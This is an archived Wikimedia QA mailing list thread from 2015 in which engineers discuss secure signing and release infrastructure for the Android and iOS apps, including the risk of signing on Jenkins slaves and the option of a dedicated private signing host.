[QA] Keeping secrets safe on Jenkins

Stephen Niedzielski sniedzielski at wikimedia.org
Wed Aug 19 18:34:11 UTC 2015 

  Good point, Brian! Our teams, and as I mentioned earlier, I think other
teams must have very similar needs. One huge distinction between Android
and iOS is platform requirement. As far as I know, the iOS app can only be
built on OS X but the Android app builds on Linux, OS X, and Windows.
However, I think Android should prefer to use Linux since that's what most
of the infrastructure uses.

  In the lack of a preexisting solution, I would like to submit a ticket.
Are there any recommendation on how I should go about this and how to
figure out if getting a release server is something that can even be done
this fiscal year? It's worth mentioning that in addition to internal
solutions, we would be open to discussing a trusted third party SaaS
provider if that's more practical. Thanks!


--stephen


On Thu, Aug 13, 2015 at 4:42 AM, Brian Gerstle <bgerstle at wikimedia.org>
wrote:

> Good discussion! iOS is interested in how this goes, as we'd also like to
> package, sign, and deploy our app securely. Our current setup lives on our
> private, OS X Jenkins server which is only accessible on WMF networks. It's
> not versioned in any way, though it could be (using Ansible or
> Boxen/puppet).
>
> Android was considering using the Mac Mini at some point. If we're the
> only two teams that need this environment at present, should we try to use
> the same machine, or at least hardware/config?
>
>
> On Wednesday, August 12, 2015, Stephen Niedzielski <
> sniedzielski at wikimedia.org> wrote:
>
>>   Thanks for the info, Dan! Assuming we went this route, what do we use
>> to manage private production configurations? Is there a project that would
>> be a good template I could check out? I would ignorantly guess that we
>> probably have at least a couple ultra secure machines somewhere and am
>> trying to come up to speed with how these are versioned and maintained, and
>> the general infrastructure available.
>>
>>
>> --stephen
>>
>> On Wed, Aug 12, 2015 at 6:32 PM, Dan Duvall <dduvall at wikimedia.org>
>> wrote:
>>
>>> On Wed, Aug 12, 2015 at 4:05 PM, Stephen Niedzielski <
>>> sniedzielski at wikimedia.org> wrote:
>>>
>>>>   Assuming a better solution does not exist, I _think_ what I'm
>>>> ultimately asking for is a Zuul managed / JJB maintained private Jenkins
>>>> instance only accessible over SSH, if that makes sense. Is there anything
>>>> like that? There must be other teams in the foundation that need a secure
>>>> release job and we could either leverage their solution or they ours.
>>>>
>>>
>>> There's a fundamental problem with signing on a Jenkins slave, private
>>> or shared, in that it will trust and execute anything the master gives it.
>>> It's also possible that the master (and other slaves by extension) is
>>> vulnerable to slave response forgery as well.[1]
>>>
>>> I think to do automated signing right, we'd want to start with a
>>> dedicated production host that independently polls/listens for CR events
>>> and executes only tightly reviewed jobs that are outside the realm of our
>>> CI Zuul/Jenkins altogether. Whether this would be a another, completely
>>> private, Jenkins /cluster/ or something lighter, I'm not sure.
>>>
>>> [1]
>>> https://groups.google.com/d/topic/jenkinsci-users/W5dKc06l1qs/discussion
>>>
>>> --
>>> Dan Duvall
>>> Automation Engineer
>>> Wikimedia Foundation <http://wikimediafoundation.org>
>>>
>>> --
>>> You received this message because you are subscribed to the Google
>>> Groups "android" group.
>>> To unsubscribe from this group and stop receiving emails from it, send
>>> an email to android+unsubscribe at wikimedia.org.
>>> To post to this group, send email to android at wikimedia.org.
>>> To view this discussion on the web visit
>>> https://groups.google.com/a/wikimedia.org/d/msgid/android/CACu0jZ5L9qAyH%3D4tOFu_k36omByAjcVBJ6OgFENn2-pu649BiQ%40mail.gmail.com
>>> <https://groups.google.com/a/wikimedia.org/d/msgid/android/CACu0jZ5L9qAyH%3D4tOFu_k36omByAjcVBJ6OgFENn2-pu649BiQ%40mail.gmail.com?utm_medium=email&utm_source=footer>
>>> .
>>>
>>
>>
>
> --
> EN Wikipedia user page: https://en.wikipedia.org/wiki/User:Brian.gerstle
> IRC: bgerstle
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.wikimedia.org/pipermail/qa/attachments/20150819/8741df30/attachment.html>

More information about the QA mailing list